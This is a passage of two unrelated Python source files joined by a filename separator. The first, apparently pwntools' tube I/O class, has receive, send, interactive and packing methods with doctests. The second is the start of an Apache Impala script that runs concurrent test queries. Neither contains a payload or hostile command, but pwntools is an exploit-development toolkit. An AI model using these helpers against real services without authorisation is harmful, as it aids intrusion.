# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return b''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> bytes
Receives one byte at a time from the tube, until ``pred(all_bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A bytes object containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = b''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return b''
if res:
data += res
else:
self.unrecv(data)
return b''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
Receives exactly `n` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> data = b'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[:1]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or b'a'
>>> t.recvn(10, timeout=0.05)
b''
>>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS
b'aaaaaa...'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return b''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout=default):
"""recvuntil(delims, drop=False, timeout=default) -> bytes
Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
arguments:
delims(bytes,tuple): Byte-string of delimiters characters, or list of delimiter byte-strings.
drop(bool): Drop the ending. If :const:`True` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello World!"
>>> t.recvuntil(b' ')
b'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil((b' ',b'W',b'o',b'r'))
b'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(b' Wor')
b'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(b' Wor', drop=True)
b'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello|World"
>>> t.recvuntil(b'|', drop=True)
b'Hello'
"""
# Convert string into singleton tupple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(map(context._encode, delims))
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = b''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(b''.join(data) + top)
raise
if not res:
self.unrecv(b''.join(data) + top)
return b''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return b''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return b''
def recvlines(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlines(numlines, keepends=False, timeout=default) -> list of bytes objects
Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (:const:`False`).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlines(3)
[b'', b'', b'']
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
[b'Foo', b'Bar', b'Baz']
>>> t.recvlines(3, True)
[b'Foo\n', b'Bar\n', b'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in range(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(b''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvlinesS(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlinesS(numlines, keepends=False, timeout=default) -> str list
This function is identical to :meth:`recvlines`, but decodes
the received bytes into string using :func:`context.encoding`.
You should use :meth:`recvlines` whenever possible for better performance.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlinesS(3)
['', '', '']
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlinesS(3)
['Foo', 'Bar', 'Baz']
"""
return [context._decode(x) for x in self.recvlines(numlines, keepends, timeout)]
def recvlinesb(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlinesb(numlines, keepends=False, timeout=default) -> bytearray list
This function is identical to :meth:`recvlines`, but returns a bytearray.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlinesb(3)
[bytearray(b''), bytearray(b''), bytearray(b'')]
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlinesb(3)
[bytearray(b'Foo'), bytearray(b'Bar'), bytearray(b'Baz')]
"""
return [bytearray(x) for x in self.recvlines(numlines, keepends, timeout)]
def recvline(self, keepends=True, timeout=default):
r"""recvline(keepends=True, timeout=default) -> bytes
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (:const:`True`).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'Foo\nBar\r\nBaz\n'
>>> t.recvline()
b'Foo\n'
>>> t.recvline()
b'Bar\r\n'
>>> t.recvline(keepends = False)
b'Baz'
>>> t.newline = b'\r\n'
>>> t.recvline(keepends = False)
b'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends=False, timeout=default):
r"""recvline_pred(pred, keepends=False) -> bytes
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns :const:`True`.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == b"Bar\n")
b'Bar'
>>> t.recvline_pred(lambda line: line == b"Bar\n", keepends=True)
b'Bar\n'
>>> t.recvline_pred(lambda line: line == b'Nope!', timeout=0.1)
b''
"""
tmpbuf = Buffer()
line = b''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.unget(tmpbuf)
raise
if not line:
self.buffer.unget(tmpbuf)
return b''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return b''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello\nWorld\nXylophone\n"
>>> t.recvline_contains(b'r')
b'World'
>>> f = lambda n: b"cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(b'pear')
b'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains((b'car', b'train'))
b'bicycle car train'
"""
if isinstance(items, (bytes, six.text_type)):
items = (items,)
items = tuple(map(context._encode, items))
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends=False, timeout=default):
r"""recvline_startswith(delims, keepends=False, timeout=default) -> bytes
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith((b'W',b'X',b'Y',b'Z'))
b'World'
>>> t.recvline_startswith((b'W',b'X',b'Y',b'Z'), True)
b'Xylophone\n'
>>> t.recvline_startswith(b'Wo')
b'World'
"""
# Convert string into singleton tupple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(map(context._encode, delims))
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends=False, timeout=default):
r"""recvline_endswith(delims, keepends=False, timeout=default) -> bytes
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith(b'r')
b'Bar'
>>> t.recvline_endswith((b'a',b'b',b'c',b'd',b'e'), True)
b'Kaboodle\n'
>>> t.recvline_endswith(b'oodle')
b'Kaboodle'
"""
# Convert string into singleton tupple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(context._encode(delim) + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact=False, timeout=default):
"""recvregex(regex, exact=False, timeout=default) -> bytes
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (bytes, six.text_type)):
regex = context._encode(regex)
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact=False, keepends=False, timeout=default):
"""recvline_regex(regex, exact=False, keepends=False, timeout=default) -> bytes
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (bytes, six.text_type)):
regex = context._encode(regex)
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout=default):
"""recvrepeat(timeout=default) -> bytes
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... b'd',
... b'', # simulate timeout
... b'c',
... b'b',
... b'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
b'abc'
>>> t.recv()
b'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> bytes
Receives data until EOF is reached.
"""
with self.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print(repr(x))
>>> t = tube()
>>> t.send_raw = p
>>> t.send(b'hello')
b'hello'
"""
data = context._encode(data)
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if len(set(data)) == 1:
self.indented('%r * %#x' % (data[0], len(data)))
elif all(c in string.printable.encode() for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=b''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print(repr(x))
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline(b'hello')
b'hello\n'
>>> t.newline = b'\r\n'
>>> t.sendline(b'hello')
b'hello\r\n'
"""
line = context._encode(line)
self.send(line + self.newline)
def sendlines(self, lines=[]):
for line in lines:
self.sendline(line)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout=timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout=timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout=timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.sendline(data)
return self.recvuntil(delim, timeout=timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works in while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(self.newline, b'\n')
if cur:
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def stream(self, line_mode=True):
"""stream()
Receive data until the tube exits, and print it to stdout.
Similar to :func:`interactive`, except that no input is sent.
Similar to ``print(tube.recvall())`` except that data is printed
as it is received, rather than after all data is received.
Arguments:
line_mode(bool): Whether to receive line-by-line or raw data.
Returns:
All data printed.
"""
buf = Buffer()
function = self.recvline if line_mode else self.recv
try:
while True:
buf.add(function())
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(buf.data[-1])
except KeyboardInterrupt:
pass
except EOFError:
pass
return buf.get()
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv(b'clean me up')
>>> t.clean(0)
b'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.self.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=[b'', b'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
b'hooray_data'
>>> data
b'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print(x.decode())
>>> def recvone(n, data=[b'data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print(repr(x))
>>> def recvone(n, data=[b'data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
b'data'
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
tube_a >> tube.b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
tube_a >> tube_b >> tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
Shorthand for connecting tubes to eachother.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
wait = wait_for_close
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv(b'data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for futher reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print(x)
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=list(map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send')))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print(x)
>>> t = tube()
>>> t.connected_raw = p
>>> _=list(map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send')))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
>>> t = tube()
>>> def p(x): print(x)
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should return ``exceptions.EOFError``, if it is unable to send any
more, because of a close tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
def fit(self, *a, **kw): return self.send(packing.fit(*a, **kw))
# Dynamic functions
def make_wrapper(func):
def wrapperb(self, *a, **kw):
return bytearray(func(self, *a, **kw))
def wrapperS(self, *a, **kw):
return context._encode(func(self, *a, **kw))
wrapperb.__doc__ = 'Same as :meth:`{func.__name__}`, but returns a bytearray'.format(func=func)
wrapperb.__name__ = func.__name__ + 'b'
wrapperS.__doc__ = 'Same as :meth:`{func.__name__}`, but returns a str,' \
'decoding the result using `context.encoding`.' \
'(note that the binary versions are way faster)'.format(func=func)
wrapperS.__name__ = func.__name__ + 'S'
return wrapperb, wrapperS
for func in [recv,
recvn,
recvall,
recvrepeat,
recvuntil,
recvpred,
recvregex,
recvline,
recvline_contains,
recvline_startswith,
recvline_endswith,
recvline_regex]:
for wrapper in make_wrapper(func):
locals()[wrapper.__name__] = wrapper
def make_wrapper(func, alias):
def wrapper(self, *a, **kw):
return func(self, *a, **kw)
wrapper.__doc__ = 'Alias for :meth:`{func.__name__}`'.format(func=func)
wrapper.__name__ = alias
return wrapper
for _name in list(locals()):
if 'recv' in _name:
_name2 = _name.replace('recv', 'read')
elif 'send' in _name:
_name2 = _name.replace('send', 'write')
else:
continue
locals()[_name2] = make_wrapper(locals()[_name], _name2)
# Clean up the scope
del wrapper, func, make_wrapper, _name, _name2
|
concurrent_workload.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This class can be used to drive a concurrent workload against a local minicluster
import argparse
import logging
# Needed to work around datetime threading bug:
# https://stackoverflow.com/questions/32245560/module-object-has-no-attribute-strptime-with-several-threads-python
import _strptime # noqa: F401
import sys
import time
from Queue import Queue
from threading import current_thread, Event, Thread
from tests.common.impala_cluster import ImpalaCluster
class ConcurrentWorkload(object):
"""This class can be used to drive concurrent streams of queries against a cluster. It
is useful when trying to carefully control the number of queries running on a cluster
concurrently. The queries typically involve some sleep statement to allow for larger
numbers of concurrently running queries.
This class should not be used for performance benchmarks, e.g. to evaluate query
throughput.
Users of this class need to make sure to call start() and stop(). Optionally, the class
supports printing the current throughput rate. The class also requires that the first
node in the cluster is a dedicated coordinator and it must already be running when
calling start().
"""
def __init__(self, query, num_streams):
self.query = query
self.num_streams = num_streams
self.stop_ev = Event()
self.output_q = Queue()
self.threads = []
self.query_rate = 0
self.query_rate_thread = Thread(target=self.compute_query_rate,
args=(self.output_q, self.stop_ev))
def execute(self, query):
"""Executes a query on the coordinator of the local minicluster."""
cluster = ImpalaCluster.get_e2e_test_cluster()
if len(cluster.impalads) == 0:
raise Exception("Coordinator not running")
client = cluster.get_first_impalad().service.create_hs2_client()
return client.execute(query)
def loop_query(self, query, output_q, stop_ev):
"""Executes 'query' in a loop while 'stop_ev' is not set and inserts the result into
'output_q'."""
while not stop_ev.is_set():
try:
output_q.put(self.execute(query))
except Exception:
if not stop_ev.is_set():
stop_ev.set()
logging.exception("Caught error, stopping")
logging.info("%s exiting" % current_thread().name)
def compute_query_rate(self, queue, stop_ev):
"""Computes the query throughput rate in queries per second averaged over the last 5
seconds. This method only returns when 'stop_ev' is set by the caller."""
AVG_WINDOW_S = 5
times = []
while not stop_ev.is_set():
# Don't block to check for stop_ev
if queue.empty():
time.sleep(0.1)
continue
queue.get()
now = time.time()
times.append(now)
# Keep only timestamps within the averaging window
start = now - AVG_WINDOW_S
times = [t for t in times if t >= start]
self.query_rate = float(len(times)) / AVG_WINDOW_S
def get_query_rate(self):
"""Returns the query rate as computed by compute_query_rate. This is thread-safe
because assignments in Python are atomic."""
return self.query_rate
def start(self):
"""Starts worker threads to execute queries."""
# Start workers
for i in xrange(self.num_streams):
t = Thread(target=self.loop_query, args=(self.query, self.output_q, self.stop_ev))
self.threads.append(t)
t.start()
self.query_rate_thread.start()
def print_query_rate(self):
"""Prints the current query throughput until user presses ctrl-c."""
try:
self._print_query_rate(self.output_q, self.stop_ev)
except KeyboardInterrupt:
self.stop()
assert self.stop_ev.is_set(), "Stop event expected to be set but it isn't"
def _print_query_rate(self, queue, stop_ev):
"""Prints the query throughput rate until 'stop_ev' is set by the caller."""
PERIOD_S = 1
print_time = time.time()
while not stop_ev.is_set():
sys.stdout.write("\rQuery rate %.2f/s" % self.query_rate)
sys.stdout.flush()
print_time += PERIOD_S
time.sleep(print_time - time.time())
sys.stdout.write("\n")
def stop(self):
"""Stops all worker threads and waits for them to finish."""
if self.stop_ev is None or self.stop_ev.is_set():
return
self.stop_ev.set()
# Wait for all workers to exit
for t in self.threads:
